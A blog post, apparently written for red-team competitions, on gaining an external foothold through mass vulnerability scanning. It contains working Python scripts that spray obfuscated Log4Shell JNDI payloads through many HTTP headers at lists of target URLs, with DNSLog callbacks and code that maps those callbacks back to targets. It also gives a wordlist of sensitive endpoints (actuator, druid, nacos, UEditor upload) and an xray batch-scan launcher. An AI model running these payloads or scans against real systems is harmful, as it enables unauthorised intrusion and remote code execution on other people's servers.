Vulnerability Scanning

Preface

The most important phase of a competition is gaining a foothold from the external network: without a point of entry you never reach the intranet and everything else is wasted. From what I have seen, the vulnerabilities that have been hot in the last few years are Shiro 550, Spring Boot RCE and Log4j RCE. The first step is therefore to scan the assets you are given for these and get a foothold fast. Of course the major OA and financial systems have vulnerabilities of their own as well.

Batch Vulnerability Scanning

log4j

fuzz spring

```python
import hashlib

import requests
import urllib3

import api.read_file  # the author's own helper module (not shown on the page); reads one URL per line

urllib3.disable_warnings()
q = b'icon_hash="116323821" && country="CN"'

# url_list = api.fofa_api.get_url(base64.b64encode(q), 4)  # alternative: pull targets from the FOFA API (needs `import base64`)
url_list = api.read_file.get_url_list('url.txt')
dnslog = 'dnslog'  # placeholder: replace with your own DNSLog domain
for url in url_list:
    # Hash each URL on its own so the printed digest identifies this target.
    hl = hashlib.md5(url.encode('utf-8'))
    print(url + '\t\t' + hl.hexdigest())
    # Log4Shell JNDI lookup in the ${::-x} obfuscated form to get past naive WAF patterns.
    # The first 5 hex chars of the hash prefix the DNSLog name so a callback can be mapped
    # back to the target. The payload string is reproduced exactly as the page gives it.
    accept = '${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}:// ' + hl.hexdigest()[0:5] + dnslog + '/poc}'
    header = {
        'Accept': accept
    }
    try:
        r = requests.get(url, headers=header, timeout=5, verify=False)
    except requests.exceptions.RequestException as e:
        print('request failed for ' + url + ': ' + str(e))
```

fuzz all headers

```python
import hashlib

import requests
import urllib3

import api.read_file  # the author's own helper module (not shown on the page); reads one URL per line

urllib3.disable_warnings()

url_list = api.read_file.get_url_list('url.txt')
dnslog = 'dnslog'  # placeholder: replace with your own DNSLog domain
for url in url_list:
    # Hash each URL on its own so the printed digest identifies this target.
    hl = hashlib.md5(url.encode('utf-8'))
    print(url + '\t\t' + hl.hexdigest())
    # Same obfuscated JNDI payload as above, reproduced exactly as the page gives it.
    poc = '${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}:// ' + hl.hexdigest()[0:5] + dnslog + '/poc}'
    # Spray every header a backend is likely to log; the header name is prefixed to
    # the value so a logged request shows which header triggered the lookup.
    header = {
        'Accept': 'accept' + '.' + poc,
        'X-Client-IP': 'X-Client-IP' + '.' + poc,
        'X-Remote-IP': 'X-Remote-IP' + '.' + poc,
        'X-Remote-Addr': 'X-Remote-Addr' + '.' + poc,
        'X-Forwarded-For': 'X-Forwarded-For' + '.' + poc,
        'X-Originating-IP': 'X-Originating-IP' + '.' + poc,
        'User-Agent': 'User-Agent' + '.' + poc,
        'Referer': 'Referer' + '.' + poc,
        'Authorization': 'Authorization' + '.' + poc
    }
    try:
        r = requests.get(url, headers=header, timeout=5, verify=False)
    except requests.exceptions.RequestException as e:
        print('request failed for ' + url + ': ' + str(e))
```
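After a spray like the two scripts above, the DNSLog panel only shows hostnames, so the scan is worth nothing unless each callback can be tied back to the target that fired it. The following is an added example, not the blog's own script, that builds the per-target token embedded in the DNSLog name, produces the same header spray, and maps recorded callbacks back to URLs; it also widens the token when two targets happen to share the same 5-hex-character prefix (20 bits is not much once the target list grows). The payload template, the placeholder DNSLog domain and every sample target and callback name are assumptions or constructed data, not values from the page.

```python
"""Added example (not the blog's own code): per-target DNSLog tokens for a Log4Shell
header spray, and mapping DNSLog callbacks back to the target that fired them."""
import hashlib
from collections import defaultdict

# Assumed payload template in the obfuscated ${::-x} form the page uses; TOKEN and
# DNSLOG are filled in per target (str.format is avoided because of the literal braces).
TEMPLATE = '${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://TOKEN.DNSLOG/poc}'

# Headers that backends commonly log, same set as the page's spray.
SPRAY_HEADERS = ['Accept', 'X-Client-IP', 'X-Remote-IP', 'X-Remote-Addr',
                 'X-Forwarded-For', 'X-Originating-IP', 'User-Agent',
                 'Referer', 'Authorization']


def target_token(url, length=5):
    """First `length` hex chars of md5(url): short enough for a DNS label, stable per target."""
    return hashlib.md5(url.encode('utf-8')).hexdigest()[:length]


def build_tokens(url_list, length=5):
    """Return {token: url}; widen the token if two different targets collide on the prefix."""
    while True:
        tokens = {}
        collided = False
        for url in url_list:
            tok = target_token(url, length)
            if tok in tokens and tokens[tok] != url:
                collided = True
                break
            tokens[tok] = url
        if not collided:
            return tokens
        length += 1  # 5 hex chars is only 20 bits; grow until every target is unique


def spray_headers(url, dnslog, length=5):
    """Headers to send to `url`; each carries the target's token so any hit is attributable."""
    payload = TEMPLATE.replace('TOKEN', target_token(url, length)).replace('DNSLOG', dnslog)
    # header name first, as on the page, so a logged request shows which header fired
    return {h: h + '.' + payload for h in SPRAY_HEADERS}


def resolve_callbacks(callback_names, tokens, dnslog):
    """Given names seen at the DNSLog server, return {url: [names]} for hits with a known token."""
    hits = defaultdict(list)
    suffix = '.' + dnslog.lower()
    for name in callback_names:
        name = name.lower().rstrip('.')
        if not name.endswith(suffix):
            continue
        # the token is the label directly under the DNSLog domain
        label = name[:-len(suffix)].split('.')[-1]
        if label in tokens:
            hits[tokens[label]].append(name)
    return dict(hits)


if __name__ == '__main__':
    # constructed sample targets and a placeholder DNSLog domain
    targets = ['http://10.0.0.1:8080/', 'http://10.0.0.2:8080/login']
    dnslog = 'x.dnslog.example'
    tokens = build_tokens(targets)
    for t in targets:
        print(t, spray_headers(t, dnslog)['User-Agent'])
    # constructed sample of what the DNSLog panel might list after the spray
    seen = [target_token(targets[1]) + '.' + dnslog, 'unrelated.' + dnslog]
    print(resolve_callbacks(seen, tokens, dnslog))
```

Keep the `tokens` map from the run that sent the requests; a later run over a reordered or extended target list may produce a different token width, and the callbacks will no longer resolve.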

shiro

The most efficient approach is simply to route all traffic through Burp Suite or xray.

telnet without a password

webfinder-3.2 can be used to scan for Telnet default passwords.

Batch scanning with dirsearch and a custom wordlist

python ..py -w D:.txt -l "C:.txt" -p socks5://127.0.0.1:7772

/actuator/env
/admin/v2/api-docs
/api/actuator/env
/api/druid/index.html
/api/env
/api/v1/api-docs
/api/v2/api-docs
/api/v3/api-docs
/druid/index.html
/env
/nacos/
/service
/Service.asmx?wsdl
/statics/ueditor/php/controller.php?action=uploadfile
/swagger-ui.html
/swagger/v1/swagger.json
/UEditor/asp/controller.asp?action=uploadfile
/ueditor/php/controller.php?action=uploadfile
/v1/api-docs
/v2/api-docs
/v3/api-docs

xray multi-threaded scanning

```python
import os
import random
import string
import subprocess
import sys
import time

file_path = '../asset/out'  # directory of URL-list files; one xray process per file
for filename in os.listdir(file_path):
    t = time.time()
    # timestamp plus 5 random chars keeps report names unique for processes started in the same second
    html_filename = str(int(t)) + "".join(random.sample(string.ascii_letters + string.digits, 5)) + '.html'
    # os.listdir() returns bare names, so join with file_path or xray will not find the file
    cmd = ['xray', 'ws', '--url-file', os.path.join(file_path, filename), '--html-output', html_filename]
    # CREATE_NEW_CONSOLE exists only on Windows; elsewhere just spawn in the background
    if sys.platform == 'win32':
        subprocess.Popen(cmd, creationflags=subprocess.CREATE_NEW_CONSOLE)
    else:
        subprocess.Popen(cmd)
```
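The script above starts one xray process per file at once, so the number of files in `../asset/out` decides how many scanners are running in parallel. As an added example, not the blog's own script, the following splits one large URL list into chunk files and then runs the same `xray ws --url-file ... --html-output ...` invocation over them with a bounded worker pool, so the concurrency is a parameter rather than an accident of the directory contents. The chunk size, the `part_NNN.txt` naming, the report naming scheme and the sample URLs are assumptions; it expects `xray` on PATH only when `scan_dir` is actually called.

```python
"""Added example (not the blog's own script): chunk a URL list and run xray over the
chunks with a bounded number of concurrent processes."""
import os
import secrets
import shutil
import subprocess
import time
from concurrent.futures import ThreadPoolExecutor


def chunk_urls(urls, per_file):
    """Split a URL list into lists of at most `per_file` entries; blank and duplicate lines are dropped."""
    seen, clean = set(), []
    for u in urls:
        u = u.strip()
        if u and u not in seen:
            seen.add(u)
            clean.append(u)
    return [clean[i:i + per_file] for i in range(0, len(clean), per_file)]


def write_chunks(chunks, out_dir):
    """Write each chunk to out_dir/part_NNN.txt (assumed naming) and return the file paths."""
    os.makedirs(out_dir, exist_ok=True)
    paths = []
    for n, chunk in enumerate(chunks):
        path = os.path.join(out_dir, 'part_%03d.txt' % n)
        with open(path, 'w') as f:
            f.write('\n'.join(chunk) + '\n')
        paths.append(path)
    return paths


def report_name(url_file):
    """Report name = chunk name + timestamp + random hex, so two reports never clash even within one second."""
    base = os.path.splitext(os.path.basename(url_file))[0]
    return '%s_%d_%s.html' % (base, int(time.time()), secrets.token_hex(3))


def xray_cmd(url_file, report):
    """Same invocation as the page's script: xray webscan over a URL file with an HTML report."""
    return ['xray', 'ws', '--url-file', url_file, '--html-output', report]


def run_xray(url_file):
    """Run one xray process to completion and return (url_file, report, exit code)."""
    report = report_name(url_file)
    rc = subprocess.run(xray_cmd(url_file, report)).returncode
    return url_file, report, rc


def scan_dir(file_path, max_workers=4):
    """Scan every file in file_path with at most max_workers xray processes at a time."""
    if shutil.which('xray') is None:
        raise RuntimeError('xray not found on PATH')
    files = [os.path.join(file_path, f) for f in sorted(os.listdir(file_path))]
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        return list(pool.map(run_xray, files))


if __name__ == '__main__':
    # constructed sample input; real use reads the asset list gathered earlier
    sample = ['http://10.0.0.%d:8080/' % i for i in range(1, 11)]
    files = write_chunks(chunk_urls(sample, 4), '../asset/out')
    print(files)
    print(scan_dir('../asset/out', max_workers=2))
```

`max_workers` should stay well below the number of chunks on a box with limited memory: every xray process keeps its own plugin state, and four or five concurrent instances are usually enough to saturate a single outbound proxy anyway.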


Source: https://blog.njcit.me/2023/02/17/华为行动/漏洞扫描/
Author: ccadmin
Published: 2023-02-17